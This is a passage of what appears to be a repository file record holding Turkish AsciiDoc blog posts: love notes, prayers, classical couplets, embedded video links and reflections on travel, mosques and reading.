duyarm\u0131\u015f.\n\n\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\n\nvideo::IC-3G7jWEbk[youtube]\n\n\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\n\nNereye gidersen mele\u011fim, avu\u00e7lar\u0131na b\u0131rakt\u0131\u011f\u0131m kalbim de seninle oraya geliyor.\n\n\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\n\n_\"Vuslat\u0131ndan g\u00f6nl\u00fcm\u00fc Allah mehc\u00fbr etmesin_ +\n_R\u00fbhumu kabzeylesin senden beni d\u00fbr etmesin\"_\n\n\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\n\nSen \u00fcz\u00fclme mele\u011fim. Hi\u00e7 \u00fcz\u00fclme. Seni tan\u0131makla dahi iftihar ederim ben. Seni sevmekle nas\u0131l \u00f6v\u00fcn\u00fcr\u00fcm var d\u00fc\u015f\u00fcn. Kimse yad\u0131rgamaz ay\u0131plamaz ama vars\u0131n \u00f6yle olsun, hi\u00e7 m\u00fchim de\u011fil. Seni sevmekten dolay\u0131 ay\u0131planacaksam \u00fcstad\u0131m Kays'a seslenirim: \"\u00c7ok \u015f\u00fck\u00fcr, beni de ay\u0131plad\u0131lar!\" +\n\nSen hi\u00e7 \u00fcz\u00fclme, g\u00fcl ki g\u00fcller a\u00e7s\u0131n g\u00fcl y\u00fcz\u00fcnde. Tan\u0131makla \u015feref buldu\u011fum seni \u00e7ok seviyorum. \n\n\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\n\n_Sen burada, kalbimdesin_ +\n_Kalbim hep seninle atacak_\n\nvideo::zCLJU1z8Cw4[youtube]\n\n\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\n\nG\u00f6\u011fe a\u00e7\u0131lan pencerem, \u0131\u015f\u0131\u011f\u0131m, nurum. Bilirim, bu aciz sevgim sana lay\u0131k olmaya yetmez. Ne kadar \u00e7ok olsa bir o kadar az kal\u0131r. \n\nSevgisiyle beni ku\u015fatan melek, sana lay\u0131k bir e\u015f olma gayesinden geri kalmamak duas\u0131nday\u0131m. \n\nG\u00fcl\u00fcnce tomurcuklar\u0131 uyand\u0131ran g\u00fczel, y\u00fcz\u00fcnde bir g\u00fcl\u00fcmseme olmak i\u00e7in can\u0131m feda. \n\nNe dersem az demi\u015fimdir, ne demi\u015fsem sana lay\u0131k olamam\u0131\u015f\u0131md\u0131r. Hi\u00e7 de\u011filse bunu bilirim. \n\nSeni seviyorum can\u0131m\u0131n i\u00e7i. *\u0130yi ki do\u011fdun.*\n\n\n\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\n\nAllah'\u0131m \u015f\u00fck\u00fcrler olsun. Bana O'nu tan\u0131ma f\u0131rsat\u0131 verdi\u011fin i\u00e7in, sevgisini kalbime nak\u015fetti\u011fin i\u00e7in. \n\n\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\n\nBirtanem \u00e7ok \u00f6zledim seni ben\n\nvideo::vd_mkHdZIEQ[youtube]\n\n\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\n\nSeni ben y\u00fcrekten, candan seviyorum\ud83d\udc95 \n\n\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\n\nHo\u015fuma gitti. Belki sen de be\u011fenirsin canca\u011f\u0131z\u0131m. \n\nvideo::5GfZahNlEh0[youtube]\n\n\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\n\nG\u00fczel olan O'nun be\u011fendi\u011fidir. \n\nvideo::9sIN1mlr2f8[youtube]\n\n\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\n\nCan\u0131m\u0131n i\u00e7i senin \u00fcz\u00fclmene y\u00fcre\u011fim dayanm\u0131yor ki. Hep y\u00fcz\u00fcn g\u00fclse. Sana \u00e7ok yak\u0131\u015f\u0131yor. \n\n\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\n\nHuzur bir enstr\u00fcman olsa senin sesinden ba\u015fkas\u0131n\u0131 \u00e7\u0131karamazd\u0131 mele\u011fim. \ud83d\udc95 \n\n\n\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\n\nvideo::CVHHLh99B3Q[youtube]\n\n\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\n\nO, benim can\u0131m. Hep yan\u0131mda olsun istiyorum. Hi\u00e7 ayr\u0131 kalmamak... \n\n\u0130yi ki var.\n\n\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\n\nAtk\u0131m \u00e7ooook g\u00fczel \ud83d\ude0d \n\nAlan, sar\u0131lan g\u00fczel \u00e7\u00fcnk\u00fc. \n\n\n\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\n\nBarda\u011f\u0131ndan su i\u00e7mek, tarifsiz bir mutluluk. Te\u015fekk\u00fcr ederim mele\u011fim her an i\u00e7in.\n\n\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\n\nSenin yan\u0131nda olman\u0131n verdi\u011fi huzur ve mutluluk bir ba\u015fka. Hep senin yan\u0131nda olabilsem. Ah ke\u015fke. \n\n\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\n\n_Bir tek seni sevmek \u00e7ok de\u011fil_\n\nvideo::303967019[vimeo]\n\n\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\n\nGeriye d\u00f6n\u00fcp bak\u0131nca seninle ge\u00e7en her an\u0131m i\u00e7in \u015f\u00fckrediyorum. Sadece yan\u0131m(n)da oldu\u011fun(m) vakitler i\u00e7in de\u011fil. Seni \u00f6zledi\u011fim, seni d\u00fc\u015f\u00fcnd\u00fc\u011f\u00fcm, hayal kurdu\u011fum her vakit k\u0131ymetli i\u015fte. Has\u0131l\u0131, sevgin kalbime kondu konal\u0131 ge\u00e7en ne kadar zaman varsa hepsi i\u00e7in binlerce \u015f\u00fck\u00fcr.\n\n\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\n\nvideo::9XFXbSJ5Cis[youtube]\n\n\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\n\nD\u00f6n\u00fcp ge\u00e7en zamana bak\u0131yorum. Hi\u00e7bir an\u0131na ke\u015fke olmasayd\u0131 diyemem, her biri ayr\u0131 k\u0131ymetli. +\nSeni sevdi\u011fim -sana a\u015f\u0131k oldu\u011fum demek istiyor- andan bu yana ne kadar \u00e7ok g\u00fczellik ya\u015fatt\u0131n bana. +\nHepsi i\u00e7in sana m\u00fcte\u015fekkirim. Sesini duymak, g\u00fcl y\u00fcz\u00fcn\u00fc g\u00f6rmek akl\u0131mdan ge\u00e7mezdi de kendimi dolunay\u0131 beklemekle avuturdum. +\n\u015eimdi her telefonum \u00e7ald\u0131\u011f\u0131nda vakit ay\u0131n on d\u00f6rd\u00fc oluyor birden. +\nHani \u015fair \u015f\u00f6yle ba\u015fl\u0131yor \u015fiirine: +\n_Seninle bir ya\u011fmur ba\u015fl\u0131yor iplik iplik_ +\n\u0130\u015fte bu ya\u011fmur ruhumu y\u0131k\u0131yor, pak ediyor. Senin getirdi\u011fin ya\u011fmur. +\nVe \u015f\u00f6yle devam ediyor ya sonraki dizede: +\n_Bir g\u00fczellik do\u011fuyor y\u00fcre\u011fime \u015fiirden_ +\nG\u00fczelli\u011fi ruhuma ve kalbime buyur eden sensin. Bu senin eserin. +\nD\u00fc\u015f\u00fcn\u00fcyorum bazen, hayat\u0131mda ne yapt\u0131m bug\u00fcne kadar? +\nSeni sevdim, i\u015fte bu kadar\u0131 yeter. +\nBak akl\u0131ma bir \u015fiir daha geldi b\u00f6yle s\u00f6yleyince. +\n_Seni sevip \u00e7ekildim dedim d\u00fcnya bu kadar_ +\nBenim d\u00fcnyam sensin prensesim.\n\n\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\n\nSen benim \"iyi ki'msin\" +\nS\u00fcrekli \u00f6zledi\u011fimsin +\n\n\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\n\n\u0130n\u015fallah tez vakitte hay\u0131rl\u0131s\u0131yla, in\u015fallah. +\nAmin. \n\n\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\n\nBo\u015f durmas\u0131ndan daha iyi bence, ne dersin can\u0131m? \ud83d\ude00 \n\nvideo::2DPUAxvd978[youtube]\n\n\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\n\n_Ben kulunum sen efendimsin benim_\n\nvideo::W0ggje8Y8Fo[youtube]\n\n\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\n\n_Bir kelebeksin, gonca \u00e7iceksin_ +\n_G\u00fczel meleksin, nazl\u0131 bebeksin_\n\nvideo::1t_3ik1dx18[youtube]\n\n\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\n\nMeftunun olmu\u015fum \ud83d\udc95 \n\nvideo::7dVnGZ5mgrQ[youtube]\n\n\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\n\nBu, burada dursun. Laz\u0131m olacak \ud83d\ude0d \n\nvideo::6pZwYgoL8L8[youtube]\n\n\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\n\nYalvar\u0131r\u0131m, ne yapaca\u011f\u0131n\u0131 bilmeyene yol g\u00f6ster. Ya da bu yolu beraber y\u00fcr\u00fcyelim. \n\nSeni seviyorum, Mahru'dan \u00f6te sevgiyle. \n\n\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\n\nY\u00fcre\u011fimde senin h\u00fczn\u00fcn\u00fc ta\u015f\u0131mak da g\u00fczel. +\n\u0130n\u015fallah \u00e7ok s\u00fcrmez senden uzak kalmam. Nefesim kesiliyor. Sensiz de\u011ferim yok. Uzatma olur mu, d\u00f6n tekrar. Allah bize hay\u0131rl\u0131 bir yol a\u00e7ar in\u015fallah.\n\n\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\n\nA\u00e7 kalma sak\u0131n. Akl\u0131m sende. Kendine iyi bak en k\u0131ymetlim. \n\nUnutuyordum az kals\u0131n, iyi ki do\u011fdun mele\u011fim. \n\n\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\n\nU\u00e7a\u011fa bindim. 22.21\n\n\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\n\nU\u00e7ak indi. 00.16\n\n","old_contents":"= K\u0131sa K\u0131sa (2)\n:hp-tags:\n\nBir s\u00fcredir haftada bir yapt\u0131\u011f\u0131m yolculuklarda fark\u0131na vard\u0131m ki her yolculuk bana \u00f6l\u00fcm\u00fc ciddi anlamda hat\u0131rlat\u0131yor. G\u00fcnl\u00fck ya\u015fant\u0131da mezarl\u0131k duvarlar\u0131n\u0131n arkas\u0131na silkeledi\u011fim(iz) bu ger\u00e7e\u011fi hat\u0131rlamama vesile oluyor yolculuklar. Her yolculuk bunu az veya \u00e7ok bir \u015fekilde y\u00e2d\u0131ma d\u00fc\u015f\u00fcr\u00fcyormu\u015f asl\u0131nda yeni farkettim. Neden sorusu bu sezi\u015fin pe\u015fine tak\u0131ld\u0131 hemencecik. \u0130lk akl\u0131ma gelen cevap \u015fu oldu: \"\u00d6l\u00fcm de bir yolculuktur neticede. Bu k\u0131sa yolculuklar o b\u00fcy\u00fck yolculu\u011fun bir musaggaras\u0131d\u0131r.\" Bir de \u015f\u00f6yle tartt\u0131m kendimi: \"Yoksa geri d\u00f6nememek korkusu mu bu ya\u015fad\u0131\u011f\u0131n?\", \"\u00d6l\u00fcm\u00fc de geri d\u00f6n\u00fc\u015f\u00fc olmayan bir gidi\u015f olarak g\u00f6r\u00fcyorsun da D\u00fcnya'ya d\u00fc\u015fk\u00fcnl\u00fc\u011f\u00fcn m\u00fc akl\u0131na getiriyor onu?\" Terazinin iki kefesine iki d\u00fc\u015f\u00fcnceyi de b\u0131rakt\u0131m, tahterevallide oynayan \u00e7ocuklar gibi hangileri a\u015fa\u011f\u0131da hangileri yukar\u0131da g\u00f6remedim.\n\n\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\n\nBu yolculuklar\u0131n bitiminde kendimi bir arkada\u015f\u0131n kuca\u011f\u0131na b\u0131rak\u0131verdim. Birka\u00e7 ayd\u0131r uzak kald\u0131\u011f\u0131m, avlusunda kedilerin ko\u015fturmacas\u0131na dald\u0131\u011f\u0131m \u00dcsk\u00fcdar Mihrimah Sultan Cami\u00ee'nden ba\u015fka bir yer de\u011fildi. Her seferinde uzaktan g\u00fcl-endam\u0131n\u0131 seyredip biraz \u00f6zlem biraz sevin\u00e7le yol al\u0131yorum ona do\u011fru. Gece en siyah \u00e7ar\u015faf\u0131 \u00f6rterken g\u00f6ky\u00fcz\u00fcne avlusuna ayak bas\u0131yorum, Valide Sultan Cami\u00ee ile s\u00f6yle\u015fmeye ba\u015fl\u0131yor iki dost. B\u00f6lm\u00fcyorum onlar\u0131, dinliyorum bir yandan \u015fad\u0131rvandan akan sular\u0131n sesi. G\u00fcne\u015f utanga\u00e7l\u0131\u011f\u0131n\u0131 k\u0131z\u0131ll\u0131klar\u0131n ard\u0131nda b\u0131rakarak g\u00f6steriyor kendini. Bir ba\u015fka dostu g\u00f6r\u00fcyorum, uzak kalman\u0131n \u0131rak edemedi\u011fi bir dostu. Sonra diyorum: \"Dostu g\u00f6rmek, bayramd\u0131r.\"\n\n\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\n\nYolculuk, okul, i\u015f derken bir yo\u011funluk kapl\u0131yor d\u00f6rt yan\u0131m\u0131. Yapaca\u011f\u0131m i\u015flerin, g\u00f6revlerin vs. zihnimi me\u015fgul etmesi san\u0131r\u0131m daha yorucu oluyor. Bu yo\u011funluk i\u00e7erisinde bir yaz\u0131y\u0131 okumak i\u00e7in zaman kollamaya \u00e7al\u0131\u015f\u0131yordum, bir t\u00fcrl\u00fc nasip olmuyordu. Okudu\u011fum zaman normalde alamayaca\u011f\u0131m bir keyfi ald\u0131m. San\u0131r\u0131m okumak i\u00e7in g\u00f6sterdi\u011fim i\u015ftiyak kitapla\/yaz\u0131yla aramda bir ba\u011f olu\u015fmas\u0131na vesile oluyor. Ayn\u0131 durum ruhen, zihnen yo\u011fun oldu\u011fum veya kendimi yaln\u0131z hissetti\u011fim -y\u0131llard\u0131r tek ya\u015famama ra\u011fmen yaln\u0131z hissetti\u011fim zamanlar, kalabal\u0131klar i\u00e7indeki yaln\u0131zl\u0131\u011f\u0131mdan az- anlarda yine ortaya \u00e7\u0131k\u0131yor. Roman\u0131n bir kahraman\u0131 omzuma dokunuyor, bir di\u011feri elini uzat\u0131yor, \u00f6b\u00fcr\u00fc g\u00fcl\u00fcms\u00fcyor. Buna en iyi \u00f6rnek _Nisan'\u0131n 2 G\u00fcn\u00fc_, basit ve yal\u0131n bir anlat\u0131m\u0131 olsa da i\u00e7inde yer buldu\u011fum bir romand\u0131. Birka\u00e7 y\u0131l \u00f6nce okul k\u00fct\u00fcphanesinde denk gelip \u00f6d\u00fcn\u00e7 alm\u0131\u015ft\u0131m. Bir k\u0131\u015f g\u00fcn\u00fc s\u0131rt\u0131m\u0131 pete\u011fe dayay\u0131p okudu\u011fumu hat\u0131rl\u0131yorum. Petek siperin bir cephesi olmu\u015ftu, ayaklar\u0131m\u0131n siperin di\u011fer cephesine de\u011fdi\u011fini hissediyordum. Kabzas\u0131 ayaklar\u0131m\u0131n ucunda bir t\u00fcfek omzuma yaslanm\u0131\u015ft\u0131.\n\n\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\n\n\u0130yi insan tan\u0131yorum, ke\u015fke daha \u00f6nce tan\u0131sayd\u0131m diyorum. Ve ke\u015fkeye \u00f6yle bir duygu ve vurgu y\u00fckl\u00fcyorum ki takat getiremiyor, eziliyor. Bir mahr\u00fb -g\u00fczel tavr\u0131 ay gibi parl\u0131yor- bed\u00e2yi-\u00e2\u015fin\u00e2 (bed\u00e2yi-\u015finas) nas\u0131l olunur \u00f6\u011fretiyor. Ben ne kadar \u00f6\u011frenebilirim bilmiyorum. Bir daha *ke\u015fke*... \n\n\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\n\nCevdet Pa\u015fa'n\u0131n eli omzuma dokundu.\n\n_Nas\u0131l \u00e7\u0131ld\u0131rmad\u0131m hayretdeyim h\u00e2l\u00e2 sevincimden_ +\n_Lis\u00e2n\u0131ndan seni sevdim s\u00f6z\u00fcn g\u00fb\u015f itdi\u011fim demler_\n\n\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\n\nG\u00f6kte ay, parl\u0131yor; ay\u0131n on d\u00f6rd\u00fcd\u00fcr. \n\n_Sana vard\u0131r y\u00fcre\u011fimde s\u00f6zlerim_\n\nvideo::So6VlDiHukI[youtube]\n\n\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\n\nDede Efendi ne dersin b\u00f6yle?\n\nvideo::vvFUnXpoUSE[youtube]\n\n\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\n\n_\"Anlat\u0131yorum, hi\u00e7 konu\u015fmadan,_ +\n_Bu\u011fday\u0131n i\u00e7ini d\u00f6kmesi gibi...\"_\n\n\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\n\nBir dua, Kays'\u0131n dilinden g\u00f6nl\u00fcme d\u00fc\u015fer: +\n_\"Gittik\u00e7e h\u00fcsn\u00fcn eyle ziy\u00e2de nig\u00e2r\u0131m\u0131n_ +\n_Geldik\u00e7e derdine beter et m\u00fcptel\u00e2 beni\"_\n\n\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\n\n-_Neden kendi c\u00fcmlelerinle konu\u015fmazs\u0131n?_ +\n-Bu h\u00e2l, akl\u0131m\u0131 setr ederken ben nas\u0131l konu\u015fay\u0131m? +\n-_Peki niye kendine s\u00f6zc\u00fcler bulursun, onlar\u0131n diliyle s\u00f6ylersin?_ +\n-Dilim kendi g\u00f6nl\u00fcmden konu\u015fsa bu ate\u015f ya\u015f yaprak m\u0131 b\u0131rak\u0131r? +\n-_Peki niye susmazs\u0131n?_ 